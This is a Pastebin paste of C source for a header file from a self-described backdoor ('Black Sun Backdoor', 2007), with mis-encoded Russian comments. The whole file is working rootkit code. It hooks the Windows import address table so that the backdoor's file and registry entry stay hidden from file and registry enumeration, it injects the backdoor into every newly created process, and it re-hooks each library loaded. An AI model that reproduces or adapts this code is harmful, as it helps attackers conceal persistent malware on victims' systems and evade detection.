Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * ---------------------------------------------------------------------
- * ____ _ _ _____
- * | _ \| | | | / ____|
- * | |_) | | __ _ ___| | _| (___ _ _ _ __
- * | _ <| |/ _` |/ __| |/ /\___ \| | | | '_ \
- * | |_) | | (_| | (__| < ____) | |_| | | | |
- * |____/|_|\__,_|\___|_|\_\_____/ \__,_|_| |_|
- * Black Sun Backdoor v1.0 prebeta
- *
- * (x) Cytech 2007
- *
- * ---------------------------------------------------------------------
- * [iathooking.h]
- * ìîäóëü ïåðåõâàòà API ìåòîäîì ìîäèôèêàöèè òàáëèöû èìïîðòà (IAT)
- * â àäðåñíîì ïðîñòðàíñòâå ÷óæîãî ïðîöåññà ïî "Ðèõòåðó".
- * ---------------------------------------------------------------------
- */
- // ----- [ ôóíêöèÿ ìîäèôèêàöèè òàáëèöû èìïîðòà â çàäàííîì ìîäóëå ] ----- //
- #define MakePtr(Type, BaseAddr, RVA) ((Type)((DWORD)(BaseAddr) + (DWORD)(RVA)))
- static DWORD WINAPI ReplaceIAT(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew, HMODULE hCModule)
- {
- PULONG ulSize;
- DWORD dwOrgProtect, dwBase;
- PIMAGE_DOS_HEADER pDOSHeader;
- PIMAGE_NT_HEADERS pNTHeaders;
- PIMAGE_IMPORT_DESCRIPTOR pIATDesc;
- PIMAGE_THUNK_DATA pThunk;
- PSTR pszModName;
- PROC* ppfn;
- pDOSHeader = (PIMAGE_DOS_HEADER)hCModule;
- if(pDOSHeader->e_magic != IMAGE_DOS_SIGNATURE) // ïðîâåðêà DOS õýäåðà
- {
- return 0;
- }
- pNTHeaders = MakePtr(PIMAGE_NT_HEADERS, pDOSHeader, pDOSHeader -> e_lfanew); // ïðîâåðêà NT õýäåðà
- if(pNTHeaders->Signature != IMAGE_NT_SIGNATURE)
- {
- return 0;
- }
- // Íàõîäèì â ìîäóëå ñìåùåíèå RVA íà IAT. Ôóíêöèÿ äîëæíà âåðíóòü íàì äåñêðèïòîð IAT
- // åñëè âñå ïðîøëî óñïåøíî, â èíîì ñëó÷àå NULL (çíà÷èò â ìîäóëå íåò òàáëèöû èìïîðòà)
- pIATDesc = (PIMAGE_IMPORT_DESCRIPTOR)
- ImageDirectoryEntryToData(hCModule, TRUE, IMAGE_DIRECTORY_ENTRY_IMPORT, &ulSize);
- /*
- * îê, òàáëèöà èìïîðòà ó íàñ â êàðìàíå. âîò èíòåðåñóþùàÿ íàñ ñòðóêòóðà IAT:
- *
- * typedef struct _IMAGE_IMPORT_DESCRIPTOR
- * {
- * union {
- * DWORD Characteristics; // 0 for terminating null import descriptor
- * DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
- * };
- * DWORD TimeDateStamp; // 0 if not bound,
- * // -1 if bound, and real date\time stamp
- * // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
- * // O.W. date/time stamp of DLL bound to (Old BIND)
- * DWORD ForwarderChain; // -1 if no forwarders
- * DWORD Name;
- * DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
- * } IMAGE_IMPORT_DESCRIPTOR;
- *
- * typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;
- */
- if (pIATDesc == NULL) return FALSE;
- // íàõîäèì äåñêðèïòîðîì íåîáõîäèìûé ðàçäåë èìïîðòà, íàñ èíòåðåñóåò ðàçäåë IAT -> Name,
- // òî åñòü èìåíà ìîäóëåé, èç êîòîðûõ èìïîðòèðóþòñÿ íåîáõîäèìûå äëÿ íàñ ôóíêöèè
- // ïåðå÷èñëÿåì äî òåõ ïîð ïîêà pszModName == kernel32.dll è çàòåì çàâåðøàåì öèêë,
- // â èíîì ñëó÷àå (åñëè öèêë íå áðÿêíóëñÿ) ìîäóëü íå èìïîðòèðóåò íèêàêèõ ôóíêöèé
- for (; pIATDesc->Name; pIATDesc++)
- {
- pszModName = (PSTR) ((PBYTE) hCModule + pIATDesc->Name);
- if (lstrcmpi(pszModName, pszCModName) == 0) break;
- }
- if (pIATDesc->Name == 0) return FALSE;
- // ïîëó÷àåì òàáëèöó àäðåñîâ èìïîðòà (IAT->FirstThunk)
- pThunk = (PIMAGE_THUNK_DATA)
- ((PBYTE) hCModule + pIATDesc->FirstThunk);
- // òåïåðü äëÿ êàæäîãî ìîäóëÿ ïåðå÷èñëÿåì âñå àäðåñà ôóíêöèé
- // è ñðàâíèâàåì ñ àäðåñîì íåîáõîäìîé íàì ôóíêöèè (òî åñòü òîé,
- // êîòîðóþ ìû áóäåì ñïëàéñèòü):
- // åñëè ppfn(àäðåñ ôóíêöèèè 'x' â IAT->Thunk) == GetProcAddress("module", 'x') òî
- // ïàò÷èì àäðåñà â IAT íà ñâîè:
- // ïðèìåð ñïëàéñèíãà íà RegEnumValueW â RegEdit.exe:
- //
- // áûëî:
- // 01001080 > . 0F77DC77 DD ADVAPI32.RegOpenKeyW
- // 01001084 > . CCD7DC77 DD ADVAPI32.RegSetValueExW
- // 01001088 > . 7D8FDE77 DD ADVAPI32.RegCreateKeyW
- // 0100108C > . 8180DC77 DD ADVAPI32.RegEnumValueW <-- RegEnumValueW
- // 01001090 > . 49D6DC77 DD ADVAPI32.RegEnumKeyW
- // ñòàëî:
- // 01001080 > . 0F77DC77 DD ADVAPI32.RegOpenKeyW
- // 01001084 > . CCD7DC77 DD ADVAPI32.RegSetValueExW
- // 01001088 > . 7D8FDE77 DD ADVAPI32.RegCreateKeyW
- // 0100108C > . 74130048 DD 48001374 <---- pwned :D BASEADDRESS áûë 0x48000000
- // 01001090 > . 49D6DC77 DD ADVAPI32.RegEnumKeyW
- for (; pThunk->u1.Function; pThunk++)
- {
- ppfn = (PROC*) &pThunk->u1.Function;
- if(*ppfn == pfnCurrent)
- {
- VirtualProtect(ppfn, sizeof(pfnNew), PAGE_READWRITE, &dwOrgProtect);
- WriteProcessMemory
- (
- GetCurrentProcess(), // ïàò÷èì â òåêóùåì ïðîöåññå
- ppfn, // ñòàðûé àäðåñ ôóíêöèè
- &pfnNew, // íàøà íîâàÿ ôóíêöèÿ 'x'
- sizeof(pfnNew), // ðàçìåð íîâîé ôóíêöèè 'x'
- NULL // íàì ýòî íå íàäî
- );
- VirtualProtect(ppfn, sizeof(pfnNew), dwOrgProtect , &dwOrgProtect);
- return TRUE;
- }
- }
- // åñëè íåòó èíòåðåñóþùåé íàñ ôóíêöèè, òî âûõîäèì )
- return FALSE;
- }
- // --- [ ôóíêöèÿ ïåðå÷èñëåíèÿ âñåõ ìîäóëåé äëÿ îòäåëüíîãî ïðîöåññà ] --- //
- static DWORD WINAPI ReplaceIATEntryInAllMods(PCSTR pszCModName, PROC pfnCurrent, PROC pfnNew)
- {
- HANDLE m_Snap = INVALID_HANDLE_VALUE;
- MODULEENTRY32 me = { sizeof(me) };
- m_Snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId());
- if (m_Snap == INVALID_HANDLE_VALUE) return 0;
- if (!Module32First(m_Snap, &me)) return 0;
- do
- {
- ReplaceIAT(pszCModName, pfnCurrent, pfnNew, me.hModule); // patch it!
- } while (Module32Next(m_Snap, &me));
- return 0;
- }
- // ------------------ [ âåðñèè çàìåíÿåìûõ ôóíêöèé ] -------------------- //
- /* // test, test :)
- * int __stdcall xMessageBoxW(HWND hwnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType)
- * {
- * return MessageBoxW(hwnd,L"this messagebox was 0wn3d",lpCaption,uType);
- * }
- *
- */
- // -----------------------------------------------------------------------------------------
- // ANSI è UNICODE âåðñèè FindFirstFile/FindNexFile.
- // Ñïëàéñèíã ýòèõ ôóíêöèé íåîáõîäèì äëÿ ñîêðûòèÿ ñâîèõ ôàéëîâ â ñèñòåìå.
- // -----------------------------------------------------------------------------------------
- static HANDLE WINAPI xFindFirstFileW (PCWSTR lpFileName, PWIN32_FIND_DATAW lpFindFileData)
- {
- char szName [256];
- HANDLE ret = FindFirstFileW(lpFileName, lpFindFileData);
- WideCharToMultiByte(CP_ACP, 0, lpFindFileData->cFileName, -1, szName, 256, NULL, NULL);
- if (lstrcmpiA(szName, EXENAME) == 0)
- {
- if (!FindNextFileW(ret, lpFindFileData))
- {
- SetLastError(ERROR_NO_MORE_FILES);
- return INVALID_HANDLE_VALUE;
- }
- }
- return ret;
- }
- static BOOL WINAPI xFindNextFileW(HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData)
- {
- char szName [256];
- BOOL ret = FindNextFileW(hFindFile, lpFindFileData);
- WideCharToMultiByte(CP_ACP, 0,lpFindFileData->cFileName, -1, szName, 256, NULL, NULL);
- if (lstrcmpiA(szName, EXENAME) == 0)
- {
- ret = FindNextFileW(hFindFile, lpFindFileData);
- }
- return ret;
- }
- static HANDLE WINAPI xFindFirstFileA (PCSTR lpFileName, PWIN32_FIND_DATAA lpFindFileData)
- {
- HANDLE ret = FindFirstFileA(lpFileName, lpFindFileData);
- if (lstrcmpiA(lpFindFileData->cFileName,EXENAME) == 0)
- {
- if (!FindNextFileA(ret, lpFindFileData)) {
- SetLastError(ERROR_NO_MORE_FILES);
- return INVALID_HANDLE_VALUE;
- }
- }
- return ret;
- }
- static BOOL WINAPI xFindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData)
- {
- BOOL ret = FindNextFileA(hFindFile, lpFindFileData);
- if (lstrcmpiA(lpFindFileData->cFileName, EXENAME) == 0)
- {
- ret = FindNextFileA(hFindFile, lpFindFileData);
- }
- return ret;
- }
- // -----------------------------------------------------------------------------------------
- // ANSI è UNICODE âåðñèè RegEnumValue.
- // Ñïëàéñèíã ýòèõ ôóíêöèè íåîáõîäèì äëÿ ñîêðûòèÿ ñâîèõ êëþ÷åé â ðååñòðå
- // -----------------------------------------------------------------------------------------
- static LONG WINAPI xRegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName,
- LPDWORD lpcValueName, LPDWORD lpReserved,
- LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
- {
- LONG ret = RegEnumValueA(hKey, dwIndex, lpValueName,
- lpcValueName, lpReserved, lpType, lpData, lpcbData);
- if (lstrcmpiA(lpValueName,REGNAME) == 0)
- return 1;
- return ret;
- }
- static LONG WINAPI xRegEnumValueW(HKEY hKey, DWORD dwIndex, LPWSTR lpValueName,
- LPDWORD lpcValueName, LPDWORD lpReserved,
- LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
- {
- char szName [256];
- LONG ret = RegEnumValueW(hKey, dwIndex, lpValueName,
- lpcValueName, lpReserved, lpType, lpData, lpcbData);
- WideCharToMultiByte(CP_ACP, 0, lpValueName, -1, szName, 256, NULL, NULL);
- if (lstrcmpiA(szName,REGNAME) == 0)
- return 1;
- return ret;
- }
- // -----------------------------------------------------------------------------------------
- // ANSI è UNICODE âåðñèè CreteProcess.
- // Ñïëàéñèíã ýòèõ ôóíêöèé íåîáõîäèì äëÿ òîãî,÷òîáû èíæåêòèðîâàòü ñåáÿ â çàïóñêàåìûå ïðîöåññû
- // -----------------------------------------------------------------------------------------
- static BOOL WINAPI xCreateProcessA(LPCSTR lpApplicationName,
- LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
- LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
- DWORD dwCreationFlags, LPVOID lpEnvironment,
- LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo,
- LPPROCESS_INFORMATION lpProcessInformation)
- {
- BOOL ret, b;
- DWORD dwRmtThdID, dwStInj;
- ret = CreateProcessA(lpApplicationName, lpCommandLine,
- lpProcessAttributes,
- lpThreadAttributes,
- bInheritHandles, dwCreationFlags | CREATE_SUSPENDED,
- lpEnvironment, lpCurrentDirectory,
- lpStartupInfo,
- lpProcessInformation);
- dwStInj = StartProcInject(lpProcessInformation->dwProcessId, NULL, StealthMain);
- if(StartProcInject)
- {
- ResumeThread(lpProcessInformation->hThread);
- }
- return ret;
- }
- static BOOL WINAPI xCreateProcessW(LPCWSTR lpApplicationName,
- LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
- LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles,
- DWORD dwCreationFlags, LPVOID lpEnvironment,
- LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo,
- LPPROCESS_INFORMATION lpProcessInformation)
- {
- BOOL ret, b;
- DWORD dwRmtThdID, dwStInj;
- ret = CreateProcessW(lpApplicationName, lpCommandLine,
- lpProcessAttributes,
- lpThreadAttributes,
- bInheritHandles, dwCreationFlags | CREATE_SUSPENDED,
- lpEnvironment, lpCurrentDirectory,
- lpStartupInfo,
- lpProcessInformation);
- dwStInj = StartProcInject(lpProcessInformation->dwProcessId, NULL, StealthMain);
- if(dwStInj)
- {
- ResumeThread(lpProcessInformation->hThread);
- }
- return ret;
- }
- // -----------------------------------------------------------------------------------------
- // ANSI è UNICODE âåðñèè LoadLibrary/LoadLibraryEx.
- // Ñïëàéñèíã ýòèõ ôóíêöèé íåîáõîäèì äëÿ òîãî,÷òîáû èíæåêòèðîâàòü ñåáÿ â ïîäãóæàåìûå ìîäóëè
- // -----------------------------------------------------------------------------------------
- static HMODULE WINAPI xLoadLibraryA(PCSTR a)
- {
- HMODULE ret = LoadLibraryA(a);
- if (ret != NULL) SetUpStealthHooks(ret);
- return ret;
- }
- static HMODULE WINAPI xLoadLibraryW(PCWSTR a)
- {
- HMODULE ret = LoadLibraryW(a);
- if (ret != NULL) SetUpStealthHooks(ret);
- return ret;
- }
- static HMODULE WINAPI xLoadLibraryExA(PCSTR a, HANDLE b, DWORD c)
- {
- HMODULE ret = LoadLibraryExA(a,b,c);
- if ((ret!=NULL)&&(c & LOAD_LIBRARY_AS_DATAFILE)==0) SetUpStealthHooks(ret);
- return ret;
- }
- static HMODULE WINAPI xLoadLibraryExW(PCWSTR a, HANDLE b, DWORD c)
- {
- HMODULE ret = LoadLibraryExW(a,b,c);
- if ((ret!=NULL)&&(c & LOAD_LIBRARY_AS_DATAFILE)==0) SetUpStealthHooks(ret);
- return ret;
- }
- // ---------------- [ ñïëàéñèíã äëÿ îäíîãî îïðåäåëåííîãî ìîäóëÿ ] ------------------- //
- static DWORD WINAPI SetUpStealthHooks(HANDLE hmodCaller)
- {
- /* // test, test :)
- * ReplaceIAT // MessageBoxW
- * (
- * "user32.dll",
- * GetProcAddress(GetModuleHandle("user32.dll"),"MessageBoxW"),
- * (PROC)xMessageBoxW,
- * hmodCaller
- * );
- */
- ReplaceIAT // RegEnumValueW
- (
- ADVAPI32_DLL,
- GetProcAddress(GetModuleHandle(ADVAPI32_DLL), "RegEnumValueW"),
- (PROC)xRegEnumValueW,
- hmodCaller
- );
- ReplaceIAT // RegEnumValueA
- (
- ADVAPI32_DLL,
- GetProcAddress(GetModuleHandle(ADVAPI32_DLL), "RegEnumValueA"),
- (PROC)xRegEnumValueA,
- hmodCaller
- );
- ReplaceIAT // FindFirstFileA
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindFirstFileA"),
- (PROC)xFindFirstFileA,
- hmodCaller
- );
- ReplaceIAT //FindNextFileA
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindNextFileA"),
- (PROC)xFindNextFileA,
- hmodCaller
- );
- ReplaceIAT // FindFirstFileW
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL), "FindFirstFileW"),
- (PROC)xFindFirstFileW,
- hmodCaller
- );
- ReplaceIAT // FindNextFileW
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindNextFileW"),
- (PROC)xFindNextFileW,
- hmodCaller
- );
- ReplaceIAT // LoadLibraryA
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryA"),
- (PROC)xLoadLibraryA,
- hmodCaller
- );
- ReplaceIAT // LoadLibraryW
- (
- KERNEL32_DLL,
- GetProcAddress( GetModuleHandle(KERNEL32_DLL),"LoadLibraryW"),
- (PROC)xLoadLibraryW,
- hmodCaller
- );
- ReplaceIAT // LoadLibraryExA
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryExA"),
- (PROC)xLoadLibraryExA,
- hmodCaller
- );
- ReplaceIAT // LoadLibraryExW
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryExW"),
- (PROC)xLoadLibraryExW,
- hmodCaller
- );
- return 0;
- }
- // ------------------ [ ñïëàéñèíã âî âñåõ ìîäóëÿõ ] -------------------- //
- static DWORD WINAPI Stealth()
- {
- ReplaceIATEntryInAllMods
- (
- ADVAPI32_DLL,
- GetProcAddress(GetModuleHandle(ADVAPI32_DLL), "RegEnumValueA"),
- (PROC)xRegEnumValueA
- );
- ReplaceIATEntryInAllMods
- (
- ADVAPI32_DLL,
- GetProcAddress(GetModuleHandle(ADVAPI32_DLL),"RegEnumValueW"),
- (PROC)xRegEnumValueW
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"CreateProcessA"),
- (PROC)xCreateProcessA
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL), "CreateProcessW"),
- (PROC)xCreateProcessW
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindFirstFileA"),
- (PROC)xFindFirstFileA
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindNextFileA"),
- (PROC)xFindNextFileA
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindFirstFileW"),
- (PROC)xFindFirstFileW
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"FindNextFileW"),
- (PROC)xFindNextFileW
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryA"),
- (PROC)xLoadLibraryA
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryW"),
- (PROC)xLoadLibraryW
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryExA"),
- (PROC)xLoadLibraryExA
- );
- ReplaceIATEntryInAllMods
- (
- KERNEL32_DLL,
- GetProcAddress(GetModuleHandle(KERNEL32_DLL),"LoadLibraryExW"),
- (PROC)xLoadLibraryExW
- );
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement